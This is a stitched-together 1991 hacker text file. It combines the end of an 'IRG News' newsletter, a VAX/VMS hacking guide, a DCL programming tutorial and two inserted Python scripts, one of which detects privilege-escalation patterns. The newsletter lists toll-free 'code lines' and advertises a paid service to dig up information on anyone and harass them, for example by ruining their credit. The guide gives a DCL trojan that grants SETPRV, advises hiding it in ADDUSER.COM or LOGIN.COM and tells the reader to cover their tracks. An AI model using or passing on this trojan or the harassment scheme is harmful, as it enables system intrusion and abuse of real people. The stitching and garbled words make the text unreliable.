will work like the BBS list in that I will have 5 VMBs each issue and every so
often I will have a master list printed.  All changes to VMBs will be posted in
each IRG News.

VMB Number           Box Number               VMB Use
-------------------------------------------------------------------------------
1-800-877-7594                                Code Line
1-800-848-1488       * 0                      Code Line / Info Line
1-800-741-5881       9 + * * 1111             Code Line / Info Line
1-800-950-0203       289                      Time Lord's Code Line/ Info Line
1-800-950-0203       617                      Code Line / Info Line

Well that's it for this installment of VMBs From Hell.  If you would like your
VMB in IRG News please leave mail at IRG/ShadowNet VMB #1 1-800-527-0543 Box
Number: 8 + 158.


8.Running The ShadowNet
-----------------------
        ShadowNet is the newest addition to IRG.  It is an information service
for anyone willing to pay.  ShadowNet works the way a Private Investigator
works...you pay us to find out information on people, except we will do much
more than that.

        We will go one step farther than any PI would go.  We will change his
phone #, send him 100 pizzas, or ruin his credit rate.  Of course the more you
pay the better you get.  At the beginning we will work for free to show that we
can do what you ask.  So get your orders in fast.  All we need is a name, phone
number, handle, whatever.  The more information you start giving us the
more you will get back.  I also am in need of "agents" or people to help work
with me.  I hope to get at least one person in each area code so information
can be found easier and faster.  Of course you are not restricted to the
computer oriented community. We can and WILL find information on ANYONE. We'll
also work for anyone who is willing to pay. So let's hear from you, either on
my BBS/VMB.  Give me your voice phone number, and your name.  I will contact you
for who you want ShadowNet to find out about. If you would like to join leave
the same info but tell me that you want to join.  Simple enough. Until Next
time.


9.Hellos and Goodbyes
---------------------
        So you are now done reading IRG-03, I hope you enjoyed yourself.  I am
sure the more IRG Newsletters me and The Spectral Demon put out the better they
will get, if possible. TSD and I have worked hard on this newsletter and now it's
your turn. Hurry & get those letters in for the next IRG News.  Now for the
hellos & goodbyes, greets and etc!

        FiRM what ever happened to you?
        INC ditto!
        Kryptic Night do you do Magic Mushrooms?
        PHA whats next for you?
      * Greets to Elite Tabloid Underground
        What ever happened to the Elite community?  Strike Back!
        Remember:  Big Brother Is Watching
        Freedom Of Speech!

* - Entries marked with *'s are by The Spectral Demon only
-------------------------------------------------------------------------------
This Is An Official IRG/ShadowNet Production All Rights Reserved
Copyright (C)   Jan. 1 1991
-------------------------------------------------------------------------------

        Call The IRG HeadQuarters:
        Insanity Lane
        Home Of IRG
        619-591-4974
        NuP: Last Try
        Running Aftershock 1.21
        Call here for the latest in IRG Productions, and invaluable P/H/C/A
        information found nowhere else, except at:

        The CorrupT SocieTy
        IRG Node 02
        619-630-8450
        NuP: Defiance
        Running AfterShock 1.21

        Also Call This Fine IRG/ShadowNet VMB #1
        1-800-527-0543
        Box Number: 8 + 158
First of course you MUST
check for the privileges of the user (just like in the above program), then
try:

$open/write file sys$scratch:adduaf.tmp
$write file "$ RUN SYS$SYSTEM:AUTHORIZE"
$write file "MODIFY NAME/PRIV=SETPRV"
$close file
$@sys$scratch:adduaf.tmp/output=sys$scratch:adduaf.dat
$del sys$scratch:adduaf.*;*


This little patch in the coding will modify your own users privileges and give
them SETPRV when the superuser executes this routine.  The trick is to hide it
within some other program so he doesn't even realize he has done anything! Of
course after the routine has been successfully executed, the original coding
should be put back.  There are many places you can put this routine, including
ADDUSER.COM (if you have write access)!  That would mean, every time the
system manager went to add a new user, he would also boost your privs! HaHa,
quite ironic eh?!  The farthest thing that he wants to do, and you make him do
it without even realizing.  Of course you should use your imagination and put
this or a similar routine in a place where it will be quickly executed.  The
longer the code stays around without being executed, the more chance that it
will be discovered.  An optimum program would be something that the
users/operators execute frequently (eg notes, mail, phone etc).  Other good
places are the LOGIN.COM and SYLOGIN.COM files.  Just remember to cover your
tracks once you're done!!

 This is but a brief introduction to Trojans and the like.  You should use your
own imagination to come up with other ways of making the system operators
succumb to your wishes...heh heh.
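
For the system manager's side of this, the added example below (not from the original file) scans command-procedure text for the pattern shown above: AUTHORIZE being driven from a script, a /PRIV change, and a scratch file that is executed and then deleted. The rule names, regular expressions and the benign sample are assumptions made for this illustration; the suspect sample is the snippet quoted above.

```python
"""Flag DCL command procedures that drive AUTHORIZE or clean up after
themselves. Added illustration; rules and the benign sample are constructed."""
import re

# Each rule: (name, regex applied to one normalized, upper-cased line).
RULES = [
    ("runs-authorize", re.compile(r"\bRUN\s+SYS\$SYSTEM:AUTHORIZE\b")),
    ("changes-privileges", re.compile(r"\b(MODIFY|ADD)\b.*/PRIV(ILEGES)?\s*=")),
    ("executes-scratch-file", re.compile(r"@\s*SYS\$SCRATCH:")),
    ("deletes-scratch-file", re.compile(r"\bDEL(ETE)?\b.*SYS\$SCRATCH:")),
]

# The snippet from the text above, one string per line.
SAMPLE_SUSPECT = "\n".join([
    '$open/write file sys$scratch:adduaf.tmp',
    '$write file "$ RUN SYS$SYSTEM:AUTHORIZE"',
    '$write file "MODIFY NAME/PRIV=SETPRV"',
    '$close file',
    '$@sys$scratch:adduaf.tmp/output=sys$scratch:adduaf.dat',
    '$del sys$scratch:adduaf.*;*',
])

# Constructed benign procedure: mentions the same words harmlessly.
SAMPLE_BENIGN = "\n".join([
    '$ ! Ask the system manager to run SYS$SYSTEM:AUTHORIZE for quota changes',
    '$ write sys$output "Scratch files live in SYS$SCRATCH: ! not a comment"',
    '$ delete/noconfirm sys$login:*.tmp;*',
])


def normalize(line):
    """Upper-case, drop the leading '$', and strip '!' comments."""
    text = line.strip().upper()
    if text.startswith("$"):
        text = text[1:].lstrip()
    out, in_quotes = [], False
    for ch in text:
        if ch == '"':
            in_quotes = not in_quotes
        elif ch == "!" and not in_quotes:
            break                       # '!' outside quotes starts a comment
        out.append(ch)
    return "".join(out).strip()


def scan_procedure(text):
    """Return a list of (line_number, rule_name) hits for one .COM file."""
    hits = []
    for number, raw in enumerate(text.splitlines(), start=1):
        line = normalize(raw)
        for name, pattern in RULES:
            if pattern.search(line):
                hits.append((number, name))
    return hits


def verdict(hits):
    """'review' when privileges are touched, 'note' for lesser hits."""
    names = {name for _, name in hits}
    if {"runs-authorize", "changes-privileges"} & names:
        return "review"
    return "note" if names else "clean"


if __name__ == "__main__":
    for label, text in (("suspect", SAMPLE_SUSPECT), ("benign", SAMPLE_BENIGN)):
        hits = scan_procedure(text)
        print(label, verdict(hits), hits)
```

DCL accepts abbreviated verbs and qualifiers, so text matching like this is a first pass; comparing protections and revision dates on shared procedures such as SYLOGIN.COM catches edits that the patterns miss.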


DCL PROGRAMMING
---------------

 No file would be complete without at least mentioning programming Command
Procedures.  Basically, these are like BAT files from MS-DOS or script files
from UNIX.  They form a rudimentary but powerful language that allows you to
quickly create small programs to handle most simple tasks.  This section is not
intended to be a full-blown tutorial on programming in DCL; rather, it's an
introduction to what it is all about.
 It is quite easy to pick up programming in DCL and the best way to learn is to
have a look at some of the COM files you will find on the various VAXes that
you hack on.  By studying these, you can quickly learn the methods on how to
perform certain routines.  Below I have listed some of the commonly needed
routines when programming in DCL:


PASSING PARAMETERS

Parameters can be passed to DCL programs directly from the shell in several
ways. Here are a few examples:

(1) @sample 24 25

    When you execute this, the values 24 and 25 are passed to the sample.com
    file in the variables p1 and p2 respectively. ie p1=24, p2=25

(2) @sample Paul Cramer

    p1=PAUL,  p2=CRAMER

(3) @sample "Paul Cramer"

    p1=Paul,  p2=Cramer

(4) name= "Paul Cramer"
    @sample 'name'

    This example demonstrates the m K  of passing predefined variables to a
    command procedure.  In this case,  p1=PAUL,  p2=CRAMER

(5) name ="""Paul Cramer"""
    @sample 'name'

    Note that passing the variable in three double-quotes preserves the case.
    p1=Paul,  p2=Cramer



GETTING INPUT

  Often it is necessary to get some sort of input from the user when executing
a command procedure.  This is performed through the INQUIRE command. Some
examples follow:

(1) INQUIRE variable "prompt"

    This will display the 'prompt' message and then wait for input.  The string
    passed is kept in 'variable'

(2) INQUIRE/NOPUNC variable "prompt"

    When you specify /NOPUNC, the prompt will NOT be followed by a colon and
    space as is the default.

(3) INQUIRE/LOCAL variable "prompt"
    INQUIRE/GLOBAL variable "prompt"

    It should be noted that if you specify /LOCAL, the variable will remain in
    the local symbol table accessible only by this particular COM file.  If on
    the other hand, you specify /GLOBAL, the variable is placed in the global
    symbol table and is made accessible to other files.

(4) IF pn .eqs. "" THEN INQUIRE pn "prompt"

    You can use this method to check if a certain variable (pn in this case) is
    null or not.  If it is, you can ask for input.

(5) READ/PROMPT="prompt" SYS$COMMAND variable

    This is another method of getting input.



SUPPLY INPUT FOR A PROGRAM

Often you may need to create a file and get input from some outside source.
Again there are several ways of doing this.  Here I will outline three
different methods:

FROM DATA      :- CREATE TEST.DAT
                  data line 1
                  data line 2
                       :
                       :
                    etc etc

FROM TERMINAL  :- DEFINE/USER_MODE SYS$INPUT SYS$COMMAND
                  CREATE TEST.DAT

FROM A FILE    :- DEFINE/USER_MODE SYS$INPUT TEST.INPUT
                  CREATE TEST.FILE


OUTPUTTING INFORMATION

In general when outputting information, you should always send it to SYS$OUTPUT.
What this does is automatically write to whatever the user has defined as
SYS$OUTPUT.  It doesn't matter what type of terminal or whatever it is, but it
will send it in the correct format.  Some examples follow:

(1)  WRITE SYS$OUTPUT "literal text"

     This will print 'literal text' on your terminal.

(2)  WRITE SYS$OUTPUT symbol-name

     This will print on your terminal whatever value is held in symbol-name

(3)  WRITE SYS$OUTPUT "literal text ''symbol-name'  literal text"

     This example shows how you can mix in normal text with a variable and
     follow it by more text.

(4)  TYPE SYS$INPUT
     this is a sample message
     that is spread out over
     several lines.

     You would use this method whenever there are more than a few lines of text
     to be printed.



WRITING TO A FILE

You will find that many times when writing a COMmand procedure you will need to
save certain information to a file.  This can be accomplished with a routine
similar to:

OPEN/WRITE FILE TEST.DAT
WRITE:
 INQUIRE DATA "Input Data"
 IF DATA .EQS. "" THEN GOTO DONE
 WRITE FILE DATA
 GOTO WRITE
DONE:
 CLOSE FILE

I will give a quick breakdown of what is going on here.  First you open the
file that you want, including the /WRITE qualifier followed by the filename.
This sample program simply inputs data, writes each line to a file and exits
when the user hits RETURN on a blank line.  Simple but effective text input
facility.



READING A FILE

Once you have written a file, you will often need to read that information back
in again. For example you may keep track of when the person last ran the file.
Each time the file is run, you would save the time/date to a file, and then
read it back in, and display it on each subsequent execution.  The sample
structure of a read routine would be:

OPEN/READ FILE TEST.DAT
READ:
 READ/END_OF_FILE=DONE FILE DATA
      .
      .
      .
 GOTO READ
DONE:
 CLOSE FILE

This routine would loop and keep reading a file, one line at a time, storing
the information in DATA until the end of file is detected.



CONDITIONAL LOGIC

No programming language would be complete without the ability to perform logic.
Although it is very simplistic, it provides just enough power to handle most
simple conditions.  Some examples:

(1) IF p1 .EQS. "" THEN GOTO DEFAULT

    In this example the procedure checks to see if the parameter passed in p1
    is NULL or not.  If it is then the program branches to DEFAULT

(2) IF p1 .NES. 10 THEN GOTO end_label
           .
           .
           .
    END_LABEL:

    Here we see that if p1 does not equal 10 then the program branches to
    END_LABEL, otherwise it continues.

(3) COUNT = 0
    LOOP:
     COUNT=COUNT+1
        .
        .
        .
     IF COUNT .LE. 10 THEN GOTO LOOP
    EXIT


    This example shows how to establish a loop in a command procedure, using
    the symbol COUNT and an IF statement.  The IF statement checks the value
    of COUNT and performs an EXIT when the value is greater than 10


EXPRESSIONS

   The data operations and comparisons are listed below in order of precedence
beginning with the highest (operations and comparisons grouped together in the
table have the same precedence).


   +--------+---------------------------------------------------------+
   Operator                    Description
   +--------+---------------------------------------------------------+
      +     Indicates a positive number
      -     Indicates a negative number
   +--------+---------------------------------------------------------+
      *     Multiplies two numbers
      /     Divides two numbers
   +--------+---------------------------------------------------------+
      +     (1) Adds two numbers
            (2) Concatenates two character strings
      -     (1) Subtracts two numbers
            (2) Subtracts two character strings
   +--------+---------------------------------------------------------+
    .EQS.   Tests if two character strings are equal
    .GES.   Tests if first character string is greater than or equal
    .GTS.   Tests if first character string is greater than
    .LES.   Tests if first character string is less than or equal
    .LTS.   Tests if first character string is less than
    .NES.   Tests if two character strings are not equal
    .EQ.    Tests if two numbers are equal
    .GE.    Tests if first number is greater than or equal to
    .GT.    Tests if first number is greater than
    .LE.    Tests if first number is less than or equal to
    .LT.    Tests if first number is less than
    .NE.    Tests if two numbers are not equal
   +--------+---------------------------------------------------------+
    .NOT.   Logically negates a number
   +--------+---------------------------------------------------------+
    .AND.   Combines two numbers with a logical AND
   +--------+---------------------------------------------------------+
    .OR.    Combines two numbers with a logical OR
   +--------+---------------------------------------------------------+




LEXICAL FUNCTIONS
-----------------

That concludes the introduction to DCL programming.  One thing that you should
keep in mind is that many powerful string editing and environment information
commands can be accessed from COM files.  These are called the LEXICAL
functions.  There are too many to list them all here, so I will just provide
a summary of the primary lexical functions and a brief description:



LEXICAL       DESCRIPTION
-------------+------------------------------------------------------------------
f$cvsi       !converts character string data (signed value) to an integer
f$cvtime     !retrieves information about an absolute, combination, or delta
             !time
f$cvui       !converts character string data (unsigned value) to an integer
f$directory  !returns the current default directory name string
f$edit       !edits a character string based on the edits specified
f$element    !extracts an element from a string in which the elements are
             !separated by a specified delimiter
f$environment!obtains information about the DCL command environment
f$extract    !extracts a substring from a character string expression
f$fao        !converts the control string to an ASCII string
f$file_attrib!returns attribute information for a specified file
f$getdvi     !returns parameters for a specified device
f$getjpi     !returns accounting, status and identification info for a process
f$getsyi     !returns status and identification information about local or
             !remote nodes.
f$identifier !converts an identifier in named format to its integer equivalent
f$integer    !returns the integer equivalent of the result of an expression
f$locate     !locates a character substring within a string and returns its
             !offset within the string
f$logical    !translates a logical name and returns the equivalence name string
f$message    !returns the message text associated with a system status code
f$mode       !shows the mode in which the process is executing
f$parse      !parses a file spec and returns either the expanded file spec or
             !a particular field that you specify
f$pid        !for each invocation, returns the next PID in sequence
f$privilege  !returns a value of TRUE or FALSE depending on whether your
             !process privileges match the privileges listed in the argument
f$process    !returns the current process name string
f$search     !searches the directory and returns the full file spec for any
             !file
f$setprv     !sets the specified privileges and returns the previous state
f$string     !returns the string equivalent of the result of the specified
             !expression
f$time       !returns the date and time of day in format:  dd-mm-yy hh:mm:ss.cc
f$trnlnm     !translates a logical name and returns the equivalent name string
f$type       !determines the data type of a symbol
f$user       !returns the current user identification code (UIC)
f$verify     !set or read current command procedure state
-------------+-----------------------------------------------------------------

This list just outlines the main lexical functions.  Within each function there
may be many more subfunctions.  If you need help on any of these functions or
their subfunctions, just type HELP lexical [lexicalname] at any DCL prompt ($).



ERROR MESSAGES
--------------

 Occasionally when you are using DCL, you will come across error messages that
are sent to you by the VAX.  Here I will give a break down of what the
different fields in the message represent and how to interpret them. First of
all, the general format of an error message is:

%facility-l-ident, text

NOTE: not all messages are ERROR messages.  Often it is only an informational
      message telling you that a certain task was successful or whatever. In
      any case here is what each field means:

facility  -this is the name of the facility that produced the  error (for
           example, CLI for the Command Language Interpreter).

l         -this is a one letter code indicating the severity of the error.
           The severities are:

                  I - Informational      E - Error
                  S - Success            F - Severe error
                  W - Warning

ident     -this is an abbreviation for the message text.

text      -this is a short description of the nature of the error.


Here is an example of an error message, and how to interpret it:

%SYSTEM-F-NOCMKRNL, operation requires CMKRNL privilege

The percent sign in the beginning tells you it is a system message from the VAX.
The first field (SYSTEM) indicates that it is a SYSTEM error.  The second field
(F) shows that it is a severe error.  The third field (NOCMKRNL) is a short
abbreviation showing that you do not have the CMKRNL privilege, and the actual
text is followed giving the error in TCHING
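
The message layout described above can be split mechanically, which helps when sifting captured session logs or batch output for privilege failures. This added example (not from the original file) parses `%facility-l-ident, text` lines; the function names and the sample log are constructed, and the handling of follow-on messages that start with `-` instead of `%` goes beyond what the text covers.

```python
"""Parse VMS system messages of the form %facility-l-ident, text.
Added illustration; the sample log below is constructed."""
import re
from collections import Counter

SEVERITY = {"S": "Success", "I": "Informational", "W": "Warning",
            "E": "Error", "F": "Severe error"}

# A leading '%' marks a primary message, a leading '-' a linked follow-on.
MESSAGE_RE = re.compile(
    r"^(?P<lead>[%-])(?P<facility>[A-Z0-9$_]+)-(?P<sev>[SIWEF])-"
    r"(?P<ident>[A-Z0-9$_]+),\s*(?P<text>.*)$")

SAMPLE_LOG = """\
$ @NIGHTLY.COM
%SYSTEM-F-NOCMKRNL, operation requires CMKRNL privilege
%TYPE-W-OPENIN, error opening SYS$SYSTEM:SYSUAF.DAT; as input
-RMS-E-PRV, insufficient privilege or file protection violation
%DIRECT-W-NOFILES, no files found
%DCL-S-SPAWNED, process GUEST_1 spawned
"""


def parse_message(line):
    """Return a dict for one message line, or None if it is not one."""
    m = MESSAGE_RE.match(line.strip())
    if not m:
        return None
    return {"primary": m.group("lead") == "%",
            "facility": m.group("facility"),
            "severity": SEVERITY[m.group("sev")],
            "ident": m.group("ident"),
            "text": m.group("text")}


def parse_log(text):
    """Group each primary message with the linked messages that follow it."""
    groups = []
    for line in text.splitlines():
        msg = parse_message(line)
        if msg is None:
            continue                      # command echo or other output
        if msg["primary"] or not groups:
            groups.append([msg])
        else:
            groups[-1].append(msg)
    return groups


def privilege_failures(groups):
    """Count E and F messages whose text mentions a missing privilege."""
    counts = Counter()
    for group in groups:
        for msg in group:
            failed = msg["severity"] in ("Error", "Severe error")
            if failed and "privilege" in msg["text"].lower():
                counts[msg["ident"]] += 1
    return counts


if __name__ == "__main__":
    groups = parse_log(SAMPLE_LOG)
    for group in groups:
        print(" / ".join(m["facility"] + ":" + m["ident"] for m in group))
    print(dict(privilege_failures(groups)))
```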

Downloaded From P-80 Systems 304-744-2253


